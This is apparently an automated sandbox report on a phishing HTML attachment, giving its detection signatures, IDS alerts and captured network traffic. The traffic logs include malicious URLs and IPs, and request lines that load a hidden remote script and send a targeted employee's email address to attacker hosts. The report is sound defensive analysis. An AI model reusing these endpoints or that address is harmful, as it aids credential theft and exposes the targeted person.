Edit tour

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Pharma.xhtml

Overview

General Information

Sample name:	#Ud83d#Udd0aAudio_Msg Pharma.xhtml renamed because original name is a hash value
Original sample name:	Audio_Msg Pharma.xhtml
Analysis ID:	1650460
MD5:	d97e1feefbffc8d82562a10b3dde201b
SHA1:	c97780ed0765a904afbfe0ef8297d1885a8bc0b2
SHA256:	6e3c117ebc04ceda9a13734a6fa6b7258fd6e4da711806b3e7b236a26866f3e2
Infos:

Detection

HTMLPhisher

Score:	88
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

AI detected suspicious Javascript

HTML IFrame injector detected

HTML Script injector detected

Suspicious Javascript code found in HTML file

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 4084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 3948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,1541385170387388932,2389478623955166807,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1944 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Pharma.xhtml" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.7.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-27T18:29:48.956954+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49758	104.168.138.190	443	TCP
2025-03-27T18:30:14.560661+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49763	104.168.138.190	443	TCP
2025-03-27T18:30:29.359776+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49779	104.168.138.190	443	TCP
2025-03-27T18:30:41.486643+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49788	104.168.138.190	443	TCP
2025-03-27T18:30:56.876334+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49794	104.168.138.190	443	TCP
2025-03-27T18:31:08.643811+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49800	104.168.138.190	443	TCP
2025-03-27T18:31:17.563945+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49805	104.168.138.190	443	TCP
2025-03-27T18:32:05.880743+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49810	104.168.138.190	443	TCP
2025-03-27T18:32:13.617024+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49815	104.168.138.190	443	TCP

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Networking
• System Summary

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com

Avira URL Cloud: Label: malware

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.7.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.3.pages.csv, type: HTML
Source: Yara match	File source: 0.6.pages.csv, type: HTML
Source: Yara match	File source: 0.5.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML
Source: Yara match	File source: 0.7.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.0..script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAud... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script creates an iframe, loads a remote script from a suspicious domain, and passes the user's email address as a parameter. This behavior is highly suspicious and indicative of a potential phishing or malware attack.

HTML IFrame injector detected

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml

HTTP Parser: New IFrame

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com

Suspicious Javascript code found in HTML file

Source: #Ud83d#Udd0aAudio_Msg Pharma.xhtml	HTTP Parser: .location
Source: #Ud83d#Udd0aAudio_Msg Pharma.xhtml	HTTP Parser: .location

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: #Ud83d#Udd0aAudio_Msg Pharma.xhtml

HTTP Parser: Base64 decoded: https://office.avcbtech.store/kuk/xls/k1u2k.js

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml

HTTP Parser: Invalid link: Forgot Password?

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml

HTTP Parser: <input type="password" .../> found

Source: #Ud83d#Udd0aAudio_Msg Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49813 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49758 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49810 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49763 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49794 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49815 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49800 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49805 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49779 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49788 -> 104.168.138.190:443

Source: global traffic

TCP traffic: 192.168.2.4:49754 -> 185.174.100.76:8248

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20
Source: Joe Sandbox View	IP Address: 139.28.36.38 139.28.36.38

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.203.86
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.131
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.131
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
